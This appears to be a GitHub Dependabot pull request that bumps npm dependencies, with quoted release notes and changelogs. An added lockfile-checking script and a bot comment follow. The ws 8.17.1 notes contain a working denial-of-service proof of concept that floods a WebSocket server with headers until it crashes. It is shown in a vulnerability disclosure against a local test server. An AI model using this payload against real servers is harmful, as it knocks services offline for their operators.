gladiaio / gladia-samples


build(deps): bump the npm_and_yarn group across 4 directories with 8 updates #37

Open dependabot[bot] opened 4 weeks ago

dependabot[bot] commented 4 weeks ago

Bumps the npm_and_yarn group with 3 updates in the /integrations-examples/discord directory: tar, undici and discord.js. Bumps the npm_and_yarn group with 4 updates in the /integrations-examples/twilio directory: ws, express, axios and twilio. Bumps the npm_and_yarn group with 3 updates in the /javascript directory: ws, axios and follow-redirects. Bumps the npm_and_yarn group with 3 updates in the /typescript directory: ws, axios and follow-redirects.

Updates tar from 6.2.0 to 6.2.1

Commits


Updates undici from 5.27.2 to 6.13.0

Release notes

Sourced from undici's releases.

v6.13.0

What's Changed

New Contributors

Full Changelog: https://github.com/nodejs/undici/compare/v6.12.0...v6.13.0

v6.12.0

What's Changed

New Contributors

... (truncated)

Commits


Updates discord.js from 14.14.1 to 14.15.3

Release notes

Sourced from discord.js's releases.

14.15.3

Bug Fixes

  • Message: Properly compare attachments and embeds (#10282) (a468ae8)
  • Throw error on no message id for Message#fetchReference() (#10295) (638b896)
  • ThreadChannel: Invalid owner fetch option (#10292) (27d0659)
  • Action: Ensure all properties on getChannel() are passed (#10278) (92c1a51)
  • docs: Some link tags didn't resolve correctly (#10269) (914cc4b)
  • actions: Handle missing poll object (#10266) (7816ec2)

Refactor

  • GuildChannelManager: Improve addFollower errors (#10277) (555961b)

Typings

  • Forum starter messages do not support polls (#10276) (35207b0)
  • Add defaultValues to respective select menu components data (#10265) (c2432d5)

14.15.2

Bug Fixes

  • PollAnswer: FetchVoters route changed to MessageManager (#10251) (30d79e8)

14.15.1

Bug Fixes

  • MessageManager: Poll methods don't need a channel id (#10249) (0474a43)

14.15.0

Bug Fixes

Documentation

... (truncated)

Changelog

Sourced from discord.js's changelog.

14.15.3 - (2024-06-02)

Bug Fixes

  • Message: Properly compare attachments and embeds (#10282) (a468ae8)
  • Throw error on no message id for Message#fetchReference() (#10295) (638b896)
  • ThreadChannel: Invalid owner fetch option (#10292) (27d0659)
  • Action: Ensure all properties on getChannel() are passed (#10278) (92c1a51)
  • docs: Some link tags didn't resolve correctly (#10269) (914cc4b)
  • actions: Handle missing poll object (#10266) (7816ec2)

Refactor

  • GuildChannelManager: Improve addFollower errors (#10277) (555961b)

Typings

  • Forum starter messages do not support polls (#10276) (35207b0)
  • Add defaultValues to respective select menu components data (#10265) (c2432d5)

14.15.2 - (2024-05-05)

Bug Fixes

  • PollAnswer: FetchVoters route changed to MessageManager (#10251) (30d79e8)

14.15.1 - (2024-05-04)

Bug Fixes

  • MessageManager: Poll methods don't need a channel id (#10249) (0474a43)

14.15.0 - (2024-05-04)

Bug Fixes

... (truncated)

Commits
  • 311aaf2 chore(release): @discordjs/builders 1.8.2, @discordjs/ws 1.1.1, and discord.j...
  • a468ae8 fix(Message): properly compare attachments and embeds (#10282)
  • 638b896 fix: Throw error on no message id for Message#fetchReference() (#10295)
  • 27d0659 fix(ThreadChannel): invalid owner fetch option (#10292)
  • 555961b refactor(GuildChannelManager): improve addFollower errors (#10277)
  • 92c1a51 fix(Action): Ensure all properties on getChannel() are passed (#10278)
  • 35207b0 types: Forum starter messages do not support polls (#10276)
  • c2432d5 types: Add defaultValues to respective select menu components data (#10265)
  • 914cc4b fix(docs): some link tags didn't resolve correctly (#10269)
  • 7816ec2 fix(actions): Handle missing poll object (#10266)
  • Additional commits viewable in compare view


Updates ws from 8.14.2 to 8.17.1

Release notes

Sourced from ws's releases.

8.17.1

Bug fixes

  • Fixed a DoS vulnerability (#2231).

A request with a number of headers exceeding the `server.maxHeadersCount` threshold could be used to crash a ws server.

```js
const http = require('http');
const WebSocket = require('ws');

const wss = new WebSocket.Server({ port: 0 }, function () {
  const chars = "!#$%&'*+-.0123456789abcdefghijklmnopqrstuvwxyz^_`|~".split('');
  const headers = {};
  let count = 0;

  for (let i = 0; i < chars.length; i++) {
    if (count === 2000) break;

    for (let j = 0; j < chars.length; j++) {
      const key = chars[i] + chars[j];
      headers[key] = 'x';

      if (++count === 2000) break;
    }
  }

  headers.Connection = 'Upgrade';
  headers.Upgrade = 'websocket';
  headers['Sec-WebSocket-Key'] = 'dGhlIHNhbXBsZSBub25jZQ==';
  headers['Sec-WebSocket-Version'] = '13';

  const request = http.request({
    headers: headers,
    host: '127.0.0.1',
    port: wss.address().port
  });

  request.end();
});
```

The vulnerability was reported by Ryan LaPointe in websockets/ws#2230.

In vulnerable versions of ws, the issue can be mitigated in the following ways:

  1. Reduce the maximum allowed length of the request headers using the `--max-http-header-size=size` and/or the `maxHeaderSize` options so that no more headers than the `server.maxHeadersCount` limit can be sent.

... (truncated)

Commits
  • 3c56601 [dist] 8.17.1
  • e55e510 [security] Fix crash when the Upgrade header cannot be read (#2231)
  • 6a00029 [test] Increase code coverage
  • ddfe4a8 [perf] Reduce the amount of crypto.randomFillSync() calls
  • b73b118 [dist] 8.17.0
  • 29694a5 [test] Use the highWaterMark variable
  • 934c9d6 [ci] Test on node 22
  • 1817bac [ci] Do not test on node 21
  • 96c9b3d [major] Flip the default value of allowSynchronousEvents (#2221)
  • e5f32c7 [fix] Emit at most one event per event loop iteration (#2218)
  • Additional commits viewable in compare view


Updates ws from 8.14.0 to 8.17.1



Updates express from 4.18.2 to 4.19.2

Release notes

Sourced from express's releases.

4.19.2

What's Changed

Full Changelog: https://github.com/expressjs/express/compare/4.19.1...4.19.2

4.19.1

What's Changed

Full Changelog: https://github.com/expressjs/express/compare/4.19.0...4.19.1

4.19.0

What's Changed

New Contributors

Full Changelog: https://github.com/expressjs/express/compare/4.18.3...4.19.0

4.18.3

Main Changes

  • Fix routing requests without method
  • deps: body-parser@1.20.2
    • Fix strict json error message on Node.js 19+
    • deps: content-type@~1.0.5
    • deps: raw-body@2.5.2

Other Changes

... (truncated)

Changelog

Sourced from express's changelog.

4.19.2 / 2024-03-25

  • Improved fix for open redirect allow list bypass

4.19.1 / 2024-03-20

  • Allow passing non-strings to res.location with new encoding handling checks

4.19.0 / 2024-03-20

  • Prevent open redirect allow list bypass due to encodeurl
  • deps: cookie@0.6.0

4.18.3 / 2024-02-29

  • Fix routing requests without method
  • deps: body-parser@1.20.2
    • Fix strict json error message on Node.js 19+
    • deps: content-type@~1.0.5
    • deps: raw-body@2.5.2
  • deps: cookie@0.6.0
    • Add partitioned option

Commits
  • 04bc627 4.19.2
  • da4d763 Improved fix for open redirect allow list bypass
  • 4f0f6cc 4.19.1
  • a003cfa Allow passing non-strings to res.location with new encoding handling checks f...
  • a1fa90f fixed un-edited version in history.md for 4.19.0
  • 11f2b1d build: fix build due to inconsistent supertest behavior in older versions
  • 084e365 4.19.0
  • 0867302 Prevent open redirect allow list bypass due to encodeurl
  • 567c9c6 Add note on how to update docs for new release (#5541)
  • 69a4cf2 deps: cookie@0.6.0
  • Additional commits viewable in compare view

Maintainer changes

This version was pushed to npm by wesleytodd, a new releaser for express since your current version.


Updates axios from 0.26.1 to 1.7.2

Release notes

Sourced from axios's releases.

Release v1.7.2

Release notes:

Bug Fixes

Contributors to this release

Release v1.7.1

Release notes:

Bug Fixes

  • fetch: fixed ReferenceError issue when TextEncoder is not available in the environment; (#6410) (733f15f)

Contributors to this release

Release v1.7.0

Release notes:

Features

Bug Fixes

  • core/axios: handle un-writable error stack (#6362) (81e0455)

Contributors to this release

Release v1.7.0-beta.2

Release notes:

Bug Fixes

  • fetch: capitalize HTTP method names; (#6395) (ad3174a)
  • fetch: fix & optimize progress capturing for cases when the request data has a nullish value or zero data length (#6400) (95a3e8e)
  • fetch: fix headers getting from a stream response; (#6401) (870e0a7)

Contributors to this release

Release v1.7.0-beta.1

Release notes:

... (truncated)

Changelog

Sourced from axios's changelog.

1.7.2 (2024-05-21)

Bug Fixes

Contributors to this release

1.7.1 (2024-05-20)

Bug Fixes

  • fetch: fixed ReferenceError issue when TextEncoder is not available in the environment; (#6410) (733f15f)

Contributors to this release

1.7.0 (2024-05-19)

Features

Bug Fixes

  • core/axios: handle un-writable error stack (#6362) (81e0455)

Contributors to this release

1.7.0-beta.2 (2024-05-19)

Bug Fixes

  • fetch: capitalize HTTP method names; (#6395) (ad3174a)
  • fetch: fix & optimize progress capturing for cases when the request data has a nullish value or zero data length (#6400) (95a3e8e)
  • fetch: fix headers getting from a stream response; (#6401) (870e0a7)

Contributors to this release

... (truncated)

Commits
  • 0e4f9fa chore(release): v1.7.2 (#6414)
  • 4f79aef fix(fetch): enhance fetch API detection; (#6413)
  • 67d1373 chore(release): v1.7.1 (#6411)
  • 733f15f fix(fetch): fixed ReferenceError issue when TextEncoder is not available in t...
  • 3041c61 [Release] v1.7.0 (#6408)
  • 18b13cb chore(docs): add fetch adapter docs; (#6407)
  • e62099b fix(fetch): fixed a possible memory leak in the AbortController for the strea...
  • b49aa8e chore(release): v1.7.0-beta.2 (#6403)
  • d57f03a chore(ci): bump create-pull-request version to fix a bug; (#6405)
  • 097b0d1 chore(ci): add tag resolution for npm releases based on package version; (#6404)
  • Additional commits viewable in compare view


Updates twilio from 4.17.0 to 4.23.0

Release notes

Sourced from twilio's releases.

4.23.0

Release Notes

Library - Chore

Api

  • remove feedback and feedback summary from call resource

Flex

  • Adding routing_properties to Interactions Channels Participant

Lookups

  • Add new line_status package to the lookup response
  • Remove live_activity package from the lookup response (breaking change)

Messaging

  • Add tollfree multiple rejection reasons response array

Trusthub

  • Add ENUM for businessRegistrationAuthority in compliance_registration. (breaking change)
  • Add new field in isIsvEmbed in compliance_registration.
  • Add additional optional fields in compliance_registration for Individual business type.

Twiml

  • Add support for new Amazon Polly and Google voices (Q1 2024) for Say verb

Docs

4.22.0

Release Notes

Library - Chore

Api

  • Updated service base url for connect apps and authorized connect apps APIs (breaking change)
  • Update documentation to reflect RiskCheck GA
  • Added optional parameter CallToken for create participant api

Events

  • Marked as GA

Flex

  • Adding flex_instance_sid to Flex Configuration
  • Adding provisioning_status for Email Manager
  • Adding offline_config to Flex Configuration

... (truncated)

Changelog

Sourced from twilio's changelog.

[2024-02-27] Version 4.23.0

Library - Chore

Api

  • remove feedback and feedback summary from call resource

Flex

  • Adding routing_properties to Interactions Channels Participant

Lookups

  • Add new line_status package to the lookup response
  • Remove live_activity package from the lookup response (breaking change)

Messaging

  • Add tollfree multiple rejection reasons response array

Trusthub

  • Add ENUM for businessRegistrationAuthority in compliance_registration. (breaking change)
  • Add new field in isIsvEmbed in compliance_registration.
  • Add additional optional fields in compliance_registration for Individual business type.

Twiml

  • Add support for new Amazon Polly and Google voices (Q1 2024) for Say verb

[2024-02-09] Version 4.22.0

Library - Chore

Api

  • Updated service base url for connect apps and authorized connect apps APIs (breaking change)
  • Update documentation to reflect RiskCheck GA
  • Added optional parameter CallToken for create participant api

Events

  • Marked as GA

Flex

  • Adding flex_instance_sid to Flex Configuration
  • ... _Description has been truncated_
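
An added example, not part of this PR or of Dependabot's output: a lockfile check that confirms the security-relevant bumps quoted above (ws 8.17.1, express 4.19.2) actually landed, including nested copies that a top-level bump can miss. It assumes the npm lockfile v2/v3 `packages` layout; `FLOORS`, `auditLockfile` and the sample lockfile are constructed for illustration.

```javascript
// Fixed releases quoted in this PR's release notes (same-major floors only).
const FLOORS = {
  ws: '8.17.1',      // "Fixed a DoS vulnerability (#2231)"
  express: '4.19.2', // "Improved fix for open redirect allow list bypass"
};

// Parse "MAJOR.MINOR.PATCH"; any prerelease/build suffix is ignored.
function parseVersion(v) {
  const m = /^(\d+)\.(\d+)\.(\d+)/.exec(v);
  if (!m) throw new Error(`unparseable version: ${v}`);
  return m.slice(1, 4).map(Number);
}

// Numeric comparison, so 8.9.0 sorts before 8.17.1.
function compareVersions(a, b) {
  const pa = parseVersion(a), pb = parseVersion(b);
  for (let i = 0; i < 3; i++) {
    if (pa[i] !== pb[i]) return pa[i] < pb[i] ? -1 : 1;
  }
  return 0;
}

// Lockfile v2/v3 keys look like "node_modules/a/node_modules/@scope/b";
// the package name is whatever follows the last "node_modules/".
function packageNameFromKey(key) {
  const marker = 'node_modules/';
  const idx = key.lastIndexOf(marker);
  return idx === -1 ? null : key.slice(idx + marker.length);
}

function auditLockfile(lock, floors = FLOORS) {
  const findings = [];
  for (const [key, meta] of Object.entries(lock.packages || {})) {
    const name = packageNameFromKey(key);
    if (!name || !Object.hasOwn(floors, name) || !meta.version) continue;
    const floor = floors[name];
    let status = 'ok';
    if (parseVersion(meta.version)[0] !== parseVersion(floor)[0]) {
      status = 'other-major'; // this page gives no fixed release for that line
    } else if (compareVersions(meta.version, floor) < 0) {
      status = 'below-fixed';
    }
    findings.push({ path: key, name, version: meta.version, floor, status });
  }
  return findings;
}

// Constructed sample lockfile: hoisted ws, nested ws, a scoped look-alike.
const SAMPLE_LOCK = {
  lockfileVersion: 3,
  packages: {
    '': { name: 'constructed-sample' },
    'node_modules/ws': { version: '8.14.2' },
    'node_modules/@discordjs/ws': { version: '1.1.1' },
    'node_modules/some-dep/node_modules/ws': { version: '7.5.9' },
    'node_modules/express': { version: '4.19.2' },
  },
};

auditLockfile(SAMPLE_LOCK).forEach((f) => console.log(f.status, `${f.name}@${f.version}`, f.path));
```

Entries reported as `other-major` need a manual check against the upstream advisory, since the release notes on this page are truncated before any backported fix versions.
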
coderabbitai[bot] commented 4 weeks ago

[!IMPORTANT]

Review skipped

Bot user detected.

To trigger a single review, invoke the @coderabbitai review command.

You can disable this status message by setting the reviews.review_status to false in the CodeRabbit configuration file.

